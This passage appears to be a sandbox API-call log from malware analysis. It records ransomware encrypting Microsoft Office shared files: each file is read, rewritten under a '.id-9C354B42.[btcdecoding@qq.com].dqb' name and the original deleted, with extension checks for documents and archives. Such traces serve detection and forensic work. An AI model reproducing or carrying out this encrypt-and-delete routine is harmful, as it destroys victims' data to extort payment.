(lpString1=".bz2", lpString2=".CGM") returned -1 [0053.319] lstrlenW (lpString=".7z") returned 3 [0053.319] lstrcmpiW (lpString1=".7z", lpString2="CGM") returned -1 [0053.319] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.CGM") returned 61 [0053.319] lstrlenW (lpString=".dbf") returned 4 [0053.319] lstrcmpiW (lpString1=".dbf", lpString2=".CGM") returned 1 [0053.319] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.CGM") returned 61 [0053.319] lstrlenW (lpString=".1cd") returned 4 [0053.319] lstrcmpiW (lpString1=".1cd", lpString2=".CGM") returned -1 [0053.319] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.CGM") returned 61 [0053.319] lstrlenW (lpString=".jpg") returned 4 [0053.319] lstrcmpiW (lpString1=".jpg", lpString2=".CGM") returned 1 [0053.319] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.CGM") returned 61 [0053.319] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.CGM") returned 61 [0053.319] lstrlenW (lpString=".doc") returned 4 [0053.319] lstrcmpiW (lpString1=".doc", lpString2=".CGM") returned 1 [0053.319] lstrlenW (lpString=".docx") returned 5 [0053.319] lstrcmpiW (lpString1=".docx", lpString2="S.CGM") returned -1 [0053.319] lstrlenW (lpString=".pdf") returned 4 [0053.319] lstrcmpiW (lpString1=".pdf", lpString2=".CGM") returned 1 [0053.319] lstrlenW (lpString=".xls") returned 4 [0053.319] lstrcmpiW (lpString1=".xls", lpString2=".CGM") returned 1 [0053.319] lstrlenW (lpString=".xlsx") returned 5 [0053.319] lstrcmpiW (lpString1=".xlsx", lpString2="S.CGM") returned -1 [0053.320] lstrlenW (lpString=".ppt") returned 4 [0053.320] lstrcmpiW (lpString1=".ppt", lpString2=".CGM") returned 1 [0053.320] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.CGM") returned 61 [0053.320] lstrlenW (lpString=".zip") returned 4 [0053.320] lstrcmpiW (lpString1=".zip", lpString2=".CGM") returned 1 [0053.320] lstrlenW (lpString=".rar") returned 4 [0053.320] lstrcmpiW (lpString1=".rar", lpString2=".CGM") returned 1 [0053.320] lstrlenW (lpString=".bz2") returned 4 [0053.320] lstrcmpiW (lpString1=".bz2", lpString2=".CGM") returned -1 [0053.320] lstrlenW (lpString=".7z") returned 3 [0053.320] lstrcmpiW (lpString1=".7z", lpString2="CGM") returned -1 [0053.320] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.CGM") returned 61 [0053.320] lstrlenW (lpString=".dbf") returned 4 [0053.320] lstrcmpiW (lpString1=".dbf", lpString2=".CGM") returned 1 [0053.320] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.CGM") returned 61 [0053.320] lstrlenW (lpString=".1cd") returned 4 [0053.320] lstrcmpiW (lpString1=".1cd", lpString2=".CGM") returned -1 [0053.320] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.CGM") returned 61 [0053.320] lstrlenW (lpString=".jpg") returned 4 [0053.320] lstrcmpiW (lpString1=".jpg", lpString2=".CGM") returned 1 [0053.320] lstrcmpiW (lpString1=".dll", lpString2=".dqb") returned -1 [0053.320] lstrlenW (lpString="msitss55.dll") returned 12 [0053.320] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\msitss55.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\help\\msitss55.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f8 [0053.768] GetFileSizeEx (in: hFile=0x1f8, lpFileSize=0x32bff1c | out: lpFileSize=0x32bff1c*=430080) returned 1 [0053.812] CloseHandle (hObject=0x1f8) returned 1 [0053.812] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\msitss55.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\help\\msitss55.dll")) returned 0x20 [0053.812] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\msitss55.dll.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\help\\msitss55.dll.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0053.812] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\msitss55.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\help\\msitss55.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f8 [0053.812] SetFilePointerEx (in: hFile=0x1f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32bfec8 | out: lpNewFilePointer=0x0) returned 1 [0053.812] SetFilePointerEx (in: hFile=0x1f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32bfec8 | out: lpNewFilePointer=0x0) returned 1 [0053.812] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\msitss55.dll.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\help\\msitss55.dll.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x168 [0054.606] GetLastError () returned 0x0 [0054.606] ReadFile (in: hFile=0x1f8, lpBuffer=0x3db0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x32bfed4, lpOverlapped=0x0 | out: lpBuffer=0x3db0020*, lpNumberOfBytesRead=0x32bfed4*=0x69000, lpOverlapped=0x0) returned 1 [0054.765] WriteFile (in: hFile=0x168, lpBuffer=0x3db0020*, nNumberOfBytesToWrite=0x69010, lpNumberOfBytesWritten=0x32bfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3db0020*, lpNumberOfBytesWritten=0x32bfc9c*=0x69010, lpOverlapped=0x0) returned 1 [0054.771] ReadFile (in: hFile=0x1f8, lpBuffer=0x3db0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x32bfed4, lpOverlapped=0x0 | out: lpBuffer=0x3db0020*, lpNumberOfBytesRead=0x32bfed4*=0x0, lpOverlapped=0x0) returned 1 [0054.771] WriteFile (in: hFile=0x168, lpBuffer=0x3db0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x32bfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3db0020*, lpNumberOfBytesWritten=0x32bfc9c*=0xec, lpOverlapped=0x0) returned 1 [0054.772] SetEndOfFile (hFile=0x168) returned 1 [0054.772] CloseHandle (hObject=0x168) returned 1 [0054.772] SetFilePointerEx (in: hFile=0x1f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32bfec8 | out: lpNewFilePointer=0x0) returned 1 [0054.772] SetEndOfFile (hFile=0x1f8) returned 1 [0054.776] CloseHandle (hObject=0x1f8) returned 1 [0054.776] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\msitss55.dll.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0054.776] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\msitss55.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\help\\msitss55.dll")) returned 1 [0054.776] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\msitss55.dll") returned 64 [0054.776] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\msitss55.dll") returned 64 [0054.776] lstrlenW (lpString=".doc") returned 4 [0054.776] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0054.776] lstrlenW (lpString=".docx") returned 5 [0054.776] lstrcmpiW (lpString1=".docx", lpString2="5.dll") returned -1 [0054.776] lstrlenW (lpString=".pdf") returned 4 [0054.776] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0054.776] lstrlenW (lpString=".xls") returned 4 [0054.776] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0054.776] lstrlenW (lpString=".xlsx") returned 5 [0054.776] lstrcmpiW (lpString1=".xlsx", lpString2="5.dll") returned -1 [0054.776] lstrlenW (lpString=".ppt") returned 4 [0054.776] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0054.776] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\msitss55.dll") returned 64 [0054.777] lstrlenW (lpString=".zip") returned 4 [0054.777] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0054.777] lstrlenW (lpString=".rar") returned 4 [0054.777] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0054.777] lstrlenW (lpString=".bz2") returned 4 [0054.777] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0054.777] lstrlenW (lpString=".7z") returned 3 [0054.777] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0054.777] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\msitss55.dll") returned 64 [0054.777] lstrlenW (lpString=".dbf") returned 4 [0054.777] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0054.777] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\msitss55.dll") returned 64 [0054.777] lstrlenW (lpString=".1cd") returned 4 [0054.777] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0054.777] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\msitss55.dll") returned 64 [0054.777] lstrlenW (lpString=".jpg") returned 4 [0054.777] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0054.777] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\msitss55.dll") returned 64 [0054.777] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\msitss55.dll") returned 64 [0054.777] lstrlenW (lpString=".doc") returned 4 [0054.777] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0054.777] lstrlenW (lpString=".docx") returned 5 [0054.777] lstrcmpiW (lpString1=".docx", lpString2="5.dll") returned -1 [0054.777] lstrlenW (lpString=".pdf") returned 4 [0054.777] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0054.777] lstrlenW (lpString=".xls") returned 4 [0054.777] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0054.777] lstrlenW (lpString=".xlsx") returned 5 [0054.777] lstrcmpiW (lpString1=".xlsx", lpString2="5.dll") returned -1 [0054.777] lstrlenW (lpString=".ppt") returned 4 [0054.777] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0054.777] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\msitss55.dll") returned 64 [0054.778] lstrlenW (lpString=".zip") returned 4 [0054.778] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0054.778] lstrlenW (lpString=".rar") returned 4 [0054.778] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0054.778] lstrlenW (lpString=".bz2") returned 4 [0054.778] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0054.778] lstrlenW (lpString=".7z") returned 3 [0054.778] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0054.778] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\msitss55.dll") returned 64 [0054.778] lstrlenW (lpString=".dbf") returned 4 [0054.778] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0054.778] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\msitss55.dll") returned 64 [0054.778] lstrlenW (lpString=".1cd") returned 4 [0054.778] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0054.778] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\msitss55.dll") returned 64 [0054.778] lstrlenW (lpString=".jpg") returned 4 [0054.778] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0054.778] lstrcmpiW (lpString1=".IDX_DLL", lpString2=".dqb") returned 1 [0054.778] lstrlenW (lpString="MSOINTL.DLL.IDX_DLL") returned 19 [0054.778] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSOINTL.DLL.IDX_DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\msointl.dll.idx_dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f8 [0054.779] GetFileSizeEx (in: hFile=0x1f8, lpFileSize=0x32bff1c | out: lpFileSize=0x32bff1c*=55680) returned 1 [0054.779] CloseHandle (hObject=0x1f8) returned 1 [0054.779] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSOINTL.DLL.IDX_DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\msointl.dll.idx_dll")) returned 0x20 [0054.779] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSOINTL.DLL.IDX_DLL.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\msointl.dll.idx_dll.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0054.779] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSOINTL.DLL.IDX_DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\msointl.dll.idx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f8 [0054.779] SetFilePointerEx (in: hFile=0x1f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32bfec8 | out: lpNewFilePointer=0x0) returned 1 [0054.779] SetFilePointerEx (in: hFile=0x1f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32bfec8 | out: lpNewFilePointer=0x0) returned 1 [0054.779] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSOINTL.DLL.IDX_DLL.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\msointl.dll.idx_dll.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x168 [0054.780] GetLastError () returned 0x0 [0054.780] ReadFile (in: hFile=0x1f8, lpBuffer=0x3db0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x32bfed4, lpOverlapped=0x0 | out: lpBuffer=0x3db0020*, lpNumberOfBytesRead=0x32bfed4*=0xd980, lpOverlapped=0x0) returned 1 [0054.791] WriteFile (in: hFile=0x168, lpBuffer=0x3db0020*, nNumberOfBytesToWrite=0xd990, lpNumberOfBytesWritten=0x32bfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3db0020*, lpNumberOfBytesWritten=0x32bfc9c*=0xd990, lpOverlapped=0x0) returned 1 [0054.793] ReadFile (in: hFile=0x1f8, lpBuffer=0x3db0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x32bfed4, lpOverlapped=0x0 | out: lpBuffer=0x3db0020*, lpNumberOfBytesRead=0x32bfed4*=0x0, lpOverlapped=0x0) returned 1 [0054.793] WriteFile (in: hFile=0x168, lpBuffer=0x3db0020*, nNumberOfBytesToWrite=0xfa, lpNumberOfBytesWritten=0x32bfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3db0020*, lpNumberOfBytesWritten=0x32bfc9c*=0xfa, lpOverlapped=0x0) returned 1 [0054.793] SetEndOfFile (hFile=0x168) returned 1 [0054.793] CloseHandle (hObject=0x168) returned 1 [0054.793] SetFilePointerEx (in: hFile=0x1f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32bfec8 | out: lpNewFilePointer=0x0) returned 1 [0054.793] SetEndOfFile (hFile=0x1f8) returned 1 [0054.794] CloseHandle (hObject=0x1f8) returned 1 [0054.795] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSOINTL.DLL.IDX_DLL.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0054.795] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSOINTL.DLL.IDX_DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\msointl.dll.idx_dll")) returned 1 [0054.795] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSOINTL.DLL.IDX_DLL") returned 80 [0054.795] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSOINTL.DLL.IDX_DLL") returned 80 [0054.795] lstrlenW (lpString=".doc") returned 4 [0054.795] lstrcmpiW (lpString1=".doc", lpString2="_DLL") returned -1 [0054.795] lstrlenW (lpString=".docx") returned 5 [0054.795] lstrcmpiW (lpString1=".docx", lpString2="X_DLL") returned -1 [0054.795] lstrlenW (lpString=".pdf") returned 4 [0054.795] lstrcmpiW (lpString1=".pdf", lpString2="_DLL") returned -1 [0054.795] lstrlenW (lpString=".xls") returned 4 [0054.795] lstrcmpiW (lpString1=".xls", lpString2="_DLL") returned -1 [0054.795] lstrlenW (lpString=".xlsx") returned 5 [0054.795] lstrcmpiW (lpString1=".xlsx", lpString2="X_DLL") returned -1 [0054.795] lstrlenW (lpString=".ppt") returned 4 [0054.795] lstrcmpiW (lpString1=".ppt", lpString2="_DLL") returned -1 [0054.795] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSOINTL.DLL.IDX_DLL") returned 80 [0054.795] lstrlenW (lpString=".zip") returned 4 [0054.796] lstrcmpiW (lpString1=".zip", lpString2="_DLL") returned -1 [0054.796] lstrlenW (lpString=".rar") returned 4 [0054.796] lstrcmpiW (lpString1=".rar", lpString2="_DLL") returned -1 [0054.796] lstrlenW (lpString=".bz2") returned 4 [0054.796] lstrcmpiW (lpString1=".bz2", lpString2="_DLL") returned -1 [0054.796] lstrlenW (lpString=".7z") returned 3 [0054.796] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1 [0054.796] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSOINTL.DLL.IDX_DLL") returned 80 [0054.796] lstrlenW (lpString=".dbf") returned 4 [0054.796] lstrcmpiW (lpString1=".dbf", lpString2="_DLL") returned -1 [0054.796] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSOINTL.DLL.IDX_DLL") returned 80 [0054.796] lstrlenW (lpString=".1cd") returned 4 [0054.796] lstrcmpiW (lpString1=".1cd", lpString2="_DLL") returned -1 [0054.796] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSOINTL.DLL.IDX_DLL") returned 80 [0054.796] lstrlenW (lpString=".jpg") returned 4 [0054.796] lstrcmpiW (lpString1=".jpg", lpString2="_DLL") returned -1 [0054.796] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSOINTL.DLL.IDX_DLL") returned 80 [0054.796] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSOINTL.DLL.IDX_DLL") returned 80 [0054.796] lstrlenW (lpString=".doc") returned 4 [0054.796] lstrcmpiW (lpString1=".doc", lpString2="_DLL") returned -1 [0054.796] lstrlenW (lpString=".docx") returned 5 [0054.796] lstrcmpiW (lpString1=".docx", lpString2="X_DLL") returned -1 [0054.796] lstrlenW (lpString=".pdf") returned 4 [0054.796] lstrcmpiW (lpString1=".pdf", lpString2="_DLL") returned -1 [0054.796] lstrlenW (lpString=".xls") returned 4 [0054.796] lstrcmpiW (lpString1=".xls", lpString2="_DLL") returned -1 [0054.796] lstrlenW (lpString=".xlsx") returned 5 [0054.796] lstrcmpiW (lpString1=".xlsx", lpString2="X_DLL") returned -1 [0054.796] lstrlenW (lpString=".ppt") returned 4 [0054.796] lstrcmpiW (lpString1=".ppt", lpString2="_DLL") returned -1 [0054.796] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSOINTL.DLL.IDX_DLL") returned 80 [0054.796] lstrlenW (lpString=".zip") returned 4 [0054.797] lstrcmpiW (lpString1=".zip", lpString2="_DLL") returned -1 [0054.797] lstrlenW (lpString=".rar") returned 4 [0054.797] lstrcmpiW (lpString1=".rar", lpString2="_DLL") returned -1 [0054.797] lstrlenW (lpString=".bz2") returned 4 [0054.797] lstrcmpiW (lpString1=".bz2", lpString2="_DLL") returned -1 [0054.797] lstrlenW (lpString=".7z") returned 3 [0054.797] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1 [0054.797] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSOINTL.DLL.IDX_DLL") returned 80 [0054.797] lstrlenW (lpString=".dbf") returned 4 [0054.797] lstrcmpiW (lpString1=".dbf", lpString2="_DLL") returned -1 [0054.797] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSOINTL.DLL.IDX_DLL") returned 80 [0054.797] lstrlenW (lpString=".1cd") returned 4 [0054.797] lstrcmpiW (lpString1=".1cd", lpString2="_DLL") returned -1 [0054.797] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSOINTL.DLL.IDX_DLL") returned 80 [0054.797] lstrlenW (lpString=".jpg") returned 4 [0054.797] lstrcmpiW (lpString1=".jpg", lpString2="_DLL") returned -1 [0054.797] lstrcmpiW (lpString1=".IDX_DLL", lpString2=".dqb") returned 1 [0054.797] lstrlenW (lpString="MSOINTL.REST.IDX_DLL") returned 20 [0054.797] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSOINTL.REST.IDX_DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\msointl.rest.idx_dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f8 [0054.798] GetFileSizeEx (in: hFile=0x1f8, lpFileSize=0x32bff1c | out: lpFileSize=0x32bff1c*=1388416) returned 1 [0054.798] CloseHandle (hObject=0x1f8) returned 1 [0054.798] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSOINTL.REST.IDX_DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\msointl.rest.idx_dll")) returned 0x20 [0054.798] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSOINTL.REST.IDX_DLL.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\msointl.rest.idx_dll.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0054.798] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSOINTL.REST.IDX_DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\msointl.rest.idx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f8 [0054.798] SetFilePointerEx (in: hFile=0x1f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32bfec8 | out: lpNewFilePointer=0x0) returned 1 [0054.798] SetFilePointerEx (in: hFile=0x1f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32bfec8 | out: lpNewFilePointer=0x0) returned 1 [0054.798] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSOINTL.REST.IDX_DLL.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\msointl.rest.idx_dll.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x168 [0054.798] GetLastError () returned 0x0 [0054.798] ReadFile (in: hFile=0x1f8, lpBuffer=0x3db0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x32bfed4, lpOverlapped=0x0 | out: lpBuffer=0x3db0020*, lpNumberOfBytesRead=0x32bfed4*=0xffff0, lpOverlapped=0x0) returned 1 [0055.093] WriteFile (in: hFile=0x168, lpBuffer=0x3db0020*, nNumberOfBytesToWrite=0xffff0, lpNumberOfBytesWritten=0x32bfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3db0020*, lpNumberOfBytesWritten=0x32bfc9c*=0xffff0, lpOverlapped=0x0) returned 1 [0055.108] ReadFile (in: hFile=0x1f8, lpBuffer=0x3db0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x32bfed4, lpOverlapped=0x0 | out: lpBuffer=0x3db0020*, lpNumberOfBytesRead=0x32bfed4*=0x52f90, lpOverlapped=0x0) returned 1 [0055.119] WriteFile (in: hFile=0x168, lpBuffer=0x3db0020*, nNumberOfBytesToWrite=0x52fa0, lpNumberOfBytesWritten=0x32bfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3db0020*, lpNumberOfBytesWritten=0x32bfc9c*=0x52fa0, lpOverlapped=0x0) returned 1 [0055.642] ReadFile (in: hFile=0x1f8, lpBuffer=0x3db0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x32bfed4, lpOverlapped=0x0 | out: lpBuffer=0x3db0020*, lpNumberOfBytesRead=0x32bfed4*=0x0, lpOverlapped=0x0) returned 1 [0055.642] WriteFile (in: hFile=0x168, lpBuffer=0x3db0020*, nNumberOfBytesToWrite=0xfc, lpNumberOfBytesWritten=0x32bfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3db0020*, lpNumberOfBytesWritten=0x32bfc9c*=0xfc, lpOverlapped=0x0) returned 1 [0055.642] SetEndOfFile (hFile=0x168) returned 1 [0055.812] CloseHandle (hObject=0x168) returned 1 [0055.812] SetFilePointerEx (in: hFile=0x1f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32bfec8 | out: lpNewFilePointer=0x0) returned 1 [0055.812] SetEndOfFile (hFile=0x1f8) returned 1 [0055.857] CloseHandle (hObject=0x1f8) returned 1 [0055.857] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSOINTL.REST.IDX_DLL.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0055.858] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSOINTL.REST.IDX_DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\msointl.rest.idx_dll")) returned 1 [0055.858] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSOINTL.REST.IDX_DLL") returned 81 [0055.858] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSOINTL.REST.IDX_DLL") returned 81 [0055.858] lstrlenW (lpString=".doc") returned 4 [0055.858] lstrcmpiW (lpString1=".doc", lpString2="_DLL") returned -1 [0055.858] lstrlenW (lpString=".docx") returned 5 [0055.858] lstrcmpiW (lpString1=".docx", lpString2="X_DLL") returned -1 [0055.858] lstrlenW (lpString=".pdf") returned 4 [0055.858] lstrcmpiW (lpString1=".pdf", lpString2="_DLL") returned -1 [0055.858] lstrlenW (lpString=".xls") returned 4 [0055.858] lstrcmpiW (lpString1=".xls", lpString2="_DLL") returned -1 [0055.858] lstrlenW (lpString=".xlsx") returned 5 [0055.858] lstrcmpiW (lpString1=".xlsx", lpString2="X_DLL") returned -1 [0055.858] lstrlenW (lpString=".ppt") returned 4 [0055.858] lstrcmpiW (lpString1=".ppt", lpString2="_DLL") returned -1 [0055.858] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSOINTL.REST.IDX_DLL") returned 81 